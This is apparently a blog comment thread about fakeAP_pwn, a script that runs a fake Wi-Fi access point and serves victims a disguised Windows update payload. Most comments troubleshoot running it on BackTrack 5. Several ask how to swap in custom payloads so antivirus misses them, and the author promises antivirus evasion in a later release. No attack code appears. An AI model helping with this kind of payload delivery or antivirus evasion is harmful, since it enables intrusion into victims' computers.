I did explain this, 8 posts above yours....
"For the people which are having trouble - I'm unable to give support right now - due to limited time. All I can say is try and do it manually else wait for fakeAP_pwn v0.4."
@sorup
Its on the todo list. However, if the machine is fully up-to-date it will still not work.
G0tm1lk, your script is the best i've ever seen! A big thanks for this!!
ReplyDeleteHow can i replace the Windows-KB183905-x86-ENU.exe with a custom payload exe to try to bypass antivirus?
tnks 4 fanTastik .sh TNKS 4 all to G0tm1lk...
ReplyDeletemy question is 4 DuDU im on BT5 figthing from one week all work fine...but not 4 dhcp3...
please can u give us solution?
@g0tmi1k I think sir all thanks belong to you lol....
ReplyDeleteI had been using a broadcom card with brcm80211 generic drivers. I noticed that the AP window had no traffic.
So.... I bought an Alfa with RTL8187 Chipset and drivers, then I set back to work on it. I am able to connect to the Alfa but it gives the target "Limited or no connectivity" warning. However traffic shows up in the AP windows now. A step better than the last adapter.
Target: XP SP3. I have tried different distances.
I may have broken either DHCP or DNS with my "fix" I may have to try another method. It may be as mundane as MTU or channel settings.
I also haven't really messed around too much with it since BT5R1 Release maybe I'll find some time next week to see what I can come up with.
@Hizagashira
ReplyDeleteThanks for the thanks.
Have a look in the options, you can tell it to use your own file. You'll need to edit the path/filename for it to use as well
@FranX
Thanks for the thanks.
Its not yet been updated for backtrack 5. I'll try and update it when I get the time to!
@PalverZ
hehe! Cheers!
its been a while since Ive done it. What version are you using? Whats the setup? Whats is the attacker running? VM install?
This comment has been removed by the author.
ReplyDeleteHi g0tm1lk your script it's just..awesome! :) I've modified the script to make it work flawlessy with Backtrack 5 just changing the paths.. Here it's fixed version: http://www.mediafire.com/?dvxxe77gf75uj5e
ReplyDelete@ptrac3
ReplyDeleteThaks for the thanks!
Cheers for the work you have put it, Ill have a look at it when I get the time too! =)
Thanks for the thanks too! I adore your blog! :=)
ReplyDeleteHI
ReplyDeleteThank you very much g0tmi1k
I have a problem, the tool before was worked very nice, but now when i
run -bash fakeAP_pwn.sh- caming error:
macchanger isn't installed
Would you like to try and install it? [Y/n]: y
when i y
caming
Failed to install macchanger
[i] Quiting
[>] Restoring: Environment
[*] Done! (= Have you... g0tmi1k?
Please please help me
When I click Yes
Come
ahmed.200007 Are you trying it on BT5? However take a look at the modified script, it could work for you ..
ReplyDeletethank you ptrac3
ReplyDeleteyes i i try in bt5
iwill try and i will came back
@ptrac3
ReplyDeleteYour welcome! =)
Glad you like it so much
@ahmed.2000007
I haven't updated it yet to make it work with backtrack 5, I just haven't had the time.
thanks ptrac3 and g0tmi1k 4 helping
ReplyDeleteMr.ptrac3 i downloaded your modified script and macchanger error going but caming another error:
Metasploit isn't installed.
[*] Would you like to try and install it? [Y/n]: y
[-] Failed to install metasploit
i used apt-get -y install metasploit
but again caming this error:
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Couldn't find package metasploit
please help me if you can
mmm are you trying it on Backtrack 5? The error above it's a matter of paths..In fact the original script for example to see if macchanger is installed looks in /usr/bin/macchanger, but in BT5 the path is slightly changed cause is /usr/local/bin/macchanger. The options are two: you can make a symbolic link (e.g. /usr/local/bin/macchanger will point to /usr/bin/macchanger) or modify the script like i did. In the script i've just modified default paths so the program can easily run on default installations of BT5, however do and updatedb and then locate macchanger so we can see where you have installed macchanger.
ReplyDeleteptrac3 thanx thanx very much i did what u said and it work
ReplyDeletethanx again 4 helping me
@ahmed.2000007 @ptrac3
ReplyDeleteGlad to hear you guys have it working! =)
hi, thanks so much. i like it but there is a big problem.when the victim download the update any antivirus can find the malware and delete it.
ReplyDeletecan you fix it or prepare another way to work it without update.
@mamalhacker
ReplyDeleteI will on the next release. =)
Excellent script. I'm sure it runs flawless on Back|Track - though haven't tested it. Had to heavily modify the script (and my box) to get it to run on my Debian box without problem. All in all, very nicely done.
ReplyDeleteAlso, dunno if you're aware, but the SVN version from googlecode is missing a few things to run properly.
Just wondering - have you ever thought of tailoring the script to run smoothly on Debian/Ubuntu/etc. and other distros? I'm willing to lend a helping hand to get this script to become more universal if you'd like.
@meebo
ReplyDeleteThanks for the thanks!
Yes, I am. The SVN is more up-to-date, has more stuff (features and bugs).
I've just been too busy with other things to update/fix it.
Yes, I have. I was hoping to do so for v0.4 release, however its a lot more moving parts...
Hi g0tmi1k, please let us know when will be ready for BT5R1
ReplyDelete[*] fakeAP_pwn v0.3 (#101)
[>] Testing: Environment
[-] macchanger isn't installed.
[*] Would you like to try and install it? [Y/n]: ^C
Thank you for doing this possible to all of us:)
We are waiting for v0.4
Cheers
@Witch Doctor
ReplyDeleteIm hoping to start work on v0.4 during this summer.
Depends on how other projects go first.